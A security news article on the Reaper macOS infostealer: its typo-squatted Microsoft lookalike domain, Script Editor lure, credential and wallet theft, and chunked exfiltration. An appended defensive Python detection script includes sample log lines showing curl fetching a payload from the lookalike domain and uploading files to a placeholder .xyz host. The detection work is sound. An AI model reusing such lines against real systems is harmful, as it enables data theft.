New Reaper Malware Uses Fake Microsoft Domain to Steal macOS Passwords

HackRead, May 18, 2026

Why It Matters

Reaper demonstrates that macOS, long considered a lower‑risk platform, is now a prime target for sophisticated credential‑theft and ransomware‑style operations, forcing enterprises to reassess their Mac security posture. The ability to bypass Apple’s latest patch and maintain persistence raises the stakes for both individual users and corporate IT teams.

Key Takeaways

  • Reaper uses typo‑squatted domain mlcrosoft.co.com for fake downloads
  • Malware tricks Script Editor to run AppleScript commands masquerading as updates
  • Steals passwords, browser data, 1Password, MetaMask, and financial files
  • Splits large files into 70 MB chunks before exfiltration to .xyz server
  • Bypasses macOS Tahoe 26.4 fix, installs persistent backdoor for later attacks

Pulse Analysis

The Reaper variant of the SHub infostealer marks a notable escalation in macOS‑focused threats. By exploiting a typo‑squatted domain that mimics popular productivity tools, attackers lure victims into clicking a specially crafted link that opens the native Script Editor. The embedded AppleScript runs silently, presenting a counterfeit Apple security update that convinces users to grant elevated privileges. This social‑engineering chain—combining domain spoofing, legitimate system utilities, and deceptive UI—allows the malware to bypass Apple’s recent macOS Tahoe 26.4 defenses, which were designed to block similar download‑based attacks.

Beyond the initial credential grab, Reaper’s capabilities extend to comprehensive data exfiltration. It harvests saved passwords from major browsers, extracts vaults from password managers like 1Password, and siphons private keys from cryptocurrency wallets such as MetaMask. The malware also scans for high‑value documents, compresses them, and uploads the data in 70 MB chunks to a concealed .xyz command‑and‑control server. A built‑in backdoor ensures continued access, enabling threat actors to pivot to additional payloads or maintain persistence for future campaigns. For enterprises with mixed‑OS environments, the ability to steal both corporate credentials and financial assets from a single Mac endpoint amplifies the potential impact.

Mitigation requires a layered approach. Users should verify download sources, avoid clicking unsolicited Script Editor links, and keep macOS and all applications patched promptly. Security teams can deploy endpoint detection solutions that monitor for anomalous AppleScript execution and unexpected curl activity. Additionally, enforcing multi‑factor authentication for privileged accounts limits the damage of stolen passwords. As attackers continue to refine macOS‑specific toolchains, organizations must treat Macs with the same rigor as Windows devices to safeguard sensitive data and maintain overall cyber resilience.
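The detection advice above (watch for anomalous AppleScript execution and unexpected curl activity, and treat the typo-squatted mlcrosoft.co.com domain as a lookalike of microsoft.com) can be turned into a small hunting rule. The following is an added example written for this summary; it is not code from HackRead or from any vendor analysis of Reaper. The process-event log format, the sample lines, the brand allowlist and the `.xyz` hostname are all constructed for the example, and the edit-distance threshold is an assumed tuning value.

```python
"""Hunt for the Reaper-style chain in endpoint process telemetry (added example).

Signals, all from the defender's side:
  1. A script host (osascript / Script Editor) spawned by a browser.
  2. curl fetching from a host whose label is a typo-squat of a protected
     brand, e.g. mlcrosoft -> microsoft (distance 1).
  3. curl launched by a script host to a host that is not on the allowlist.
Log format and every sample line below are constructed for this example.
"""
import re
import shlex
from urllib.parse import urlparse

# Assumed brand table: label to watch -> the brand's genuine registrable domain.
PROTECTED_BRANDS = {"microsoft": "microsoft.com", "apple": "apple.com"}
BROWSERS = {"Safari", "Google Chrome", "Firefox"}
SCRIPT_HOSTS = {"osascript", "Script Editor"}
# Assumed allowlist of legitimate update origins (constructed for the example).
ALLOWED_HOSTS = {"swcdn.apple.com", "download.microsoft.com"}

# Constructed telemetry line shape: ts parent="..." proc="..." args="..."
LINE_RE = re.compile(
    r'^(?P<ts>\S+) parent="(?P<parent>[^"]*)" proc="(?P<proc>[^"]*)" args="(?P<args>[^"]*)"$'
)

SAMPLE_LOG = [  # constructed sample events, not real telemetry
    '2026-05-18T09:14:02Z parent="Safari" proc="Script Editor" args="/tmp/update.scpt"',
    '2026-05-18T09:14:05Z parent="Script Editor" proc="osascript" args="/tmp/update.scpt"',
    '2026-05-18T09:14:30Z parent="osascript" proc="curl" args="-s https://mlcrosoft.co.com/update.pkg -o /tmp/update.pkg"',
    '2026-05-18T09:16:10Z parent="osascript" proc="curl" args="-T /tmp/part.001 https://exfil-placeholder.xyz/upload"',
    '2026-05-18T09:20:00Z parent="softwareupdated" proc="curl" args="https://swcdn.apple.com/content/x.pkg"',
    '2026-05-18T09:25:00Z parent="Terminal" proc="curl" args="-I https://example.org/"',
]


def edit_distance(a, b):
    """Levenshtein distance, used to spot one- or two-character typo-squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_brand(host):
    """Return the brand a hostname imitates, or None if it is genuine/unrelated.

    Every label is checked, so mlcrosoft.co.com is caught even though its
    registrable domain is under co.com rather than a .com of its own.
    """
    host = host.lower().rstrip(".")
    for brand, real in PROTECTED_BRANDS.items():
        if host == real or host.endswith("." + real):
            return None  # the brand's own domain
    for label in host.split("."):
        if len(label) < 4:  # skip "co", "com", "xyz" and similar
            continue
        for brand in PROTECTED_BRANDS:
            limit = 2 if len(brand) >= 8 else 1  # assumed tuning threshold
            if edit_distance(label, brand) <= limit:
                return brand
    return None


def curl_target(args):
    """Extract the hostname of the first URL in a curl command line."""
    for tok in shlex.split(args):
        if tok.startswith(("http://", "https://")):
            return urlparse(tok).hostname
    return None


def analyze(lines):
    """Run the three rules over log lines; return (rule, timestamp, detail) tuples."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, parent, proc, args = m.group("ts", "parent", "proc", "args")
        if proc in SCRIPT_HOSTS and parent in BROWSERS:
            alerts.append(("script_host_from_browser", ts, f"{parent} -> {proc} {args}"))
        if proc == "curl":
            host = curl_target(args) or ""
            brand = lookalike_brand(host)
            if brand:
                alerts.append(("typosquat_download", ts, f"{host} imitates {brand}"))
            elif parent in SCRIPT_HOSTS and host not in ALLOWED_HOSTS:
                alerts.append(("curl_from_script_host", ts, f"{parent} -> curl {host}"))
    return alerts


if __name__ == "__main__":
    for rule, ts, detail in analyze(SAMPLE_LOG):
        print(f"{ts} {rule}: {detail}")
```

Run against the constructed log, the script raises three alerts: the browser-to-Script Editor launch, the download from the lookalike domain, and the upload from a script host to a non-allowlisted host; the genuine Apple update fetch and the interactive Terminal curl stay quiet. In production the parent/child relationship would come from an EDR or Endpoint Security Framework feed rather than a text log, but the rule logic is the same.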
